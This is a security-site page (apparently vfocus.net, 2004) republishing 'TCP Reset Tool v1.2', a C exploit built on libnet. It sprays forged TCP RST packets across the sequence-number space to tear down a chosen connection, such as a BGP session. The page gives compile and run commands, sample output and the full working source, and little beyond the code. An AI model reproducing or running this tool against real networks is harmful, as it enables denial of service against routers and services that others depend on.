首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TCP Reset Tool v1.2
来源:vfocus.net 作者:Paul 发布时间:2004-04-26  

/*
By: Paul A. Watson
Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1

COMPILE:
gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a
or
gcc -o reset-tcp reset-tcp.c -lnet
** be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems!

EXECUTE:
reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size]

EXAMPLE (and timing packets sent with /bin/date):
[root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date
Tue Dec 16 21:18:28 CST 2003
Packets sent: 8192 Sequence guess: 536805376
Packets sent: 16384 Sequence guess: 1073676288
Packets sent: 24576 Sequence guess: 1610547200
Packets sent: 32768 Sequence guess: 2147418112
Packets sent: 40960 Sequence guess: 2684289024
Packets sent: 49152 Sequence guess: 3221159936
Packets sent: 57344 Sequence guess: 3758030848
packets sent: 65535
Tue Dec 16 21:18:46 CST 2003
[root@orc BGP]#
*/

/* modified by: J. Barber A.K.A Swoop
modified to use src mac from your interface and asks for the
destination mac on the command line.

New Command-Line Example:
./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536

swoopafied: 3/30/04
*/

#include <libnet.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
int c;
unsigned long int count=0;
unsigned long int count2=0;
unsigned long int seqguess=0;
unsigned long int seqstart=0;
unsigned long int seqincrement=0;
unsigned long int seqmax=4294967295;
u_char *cp;
libnet_t *l;
libnet_ptag_t t;
char *payload;
char * device = argv[1];
u_short payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];

char sourceip[32] = "";
char destinationip[32] = "";

/* Change these to suit your local environment values */
/* Make enet_dst either the default gateway or destination host */
struct libnet_ether_addr *ptr_enet_src;
u_char enet_src[6];
u_char enet_dst[6];
u_char org_code[3] = {0x00, 0x00, 0x00};

/* Its only test code, so minimal checking is performed... */
if (argc<8) {
printf("TCP Reset Tool v1.2\nBy Paul Watson - Modified by J. Barber\n");
printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [gateway/destination MAC] [window size]\n",argv[0]);
printf("Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536\n");
exit(1);
}

strcpy(sourceip,argv[2]);
src_prt = atoi(argv[3]);
strcpy(destinationip,argv[4]);
dst_prt = atoi(argv[5]);
seqincrement= atoi(argv[7]);
seqstart= 0;
seqmax = 4294967295; /* 2^32 */

payload = NULL;
payload_s = 0;
src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE);
dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE);

memset(enet_dst, 0, sizeof(enet_dst));
sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0],
&enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4],
&enet_dst[5]);

l = libnet_init(LIBNET_LINK,device,errbuf);
ptr_enet_src = libnet_get_hwaddr(l);
memcpy(&enet_src[0], ptr_enet_src,6);
printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3],enet_src[4],enet_src[5]);
printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3],enet_dst[4],enet_dst[5]);

for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) {
count++; count2++;
if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); }
l = libnet_init(LIBNET_LINK,device,errbuf);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0);

t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
c = libnet_write(l);
}
printf("packets sent: %i\n",count);
return (EXIT_FAILURE);
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TCP vulnerability proof of con
·BGP denial of service exploit
·UMOD arbitrary file overwritin
·Microsoft IIS 5.x SSL PCT Remo
·TCP Connection Reset Remote Wi
·Win Lsasrv.dll RPC buffer over
·Microsoft windows lsass.exe lo
·MS04011.cpp
·Windows schannel.dll PCT1 协议
·Microsoft Win Utility Manager
·Windows Lsasrv.dll RPC Remote
·kernel 2.x MCAST_MSFILTER Proo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved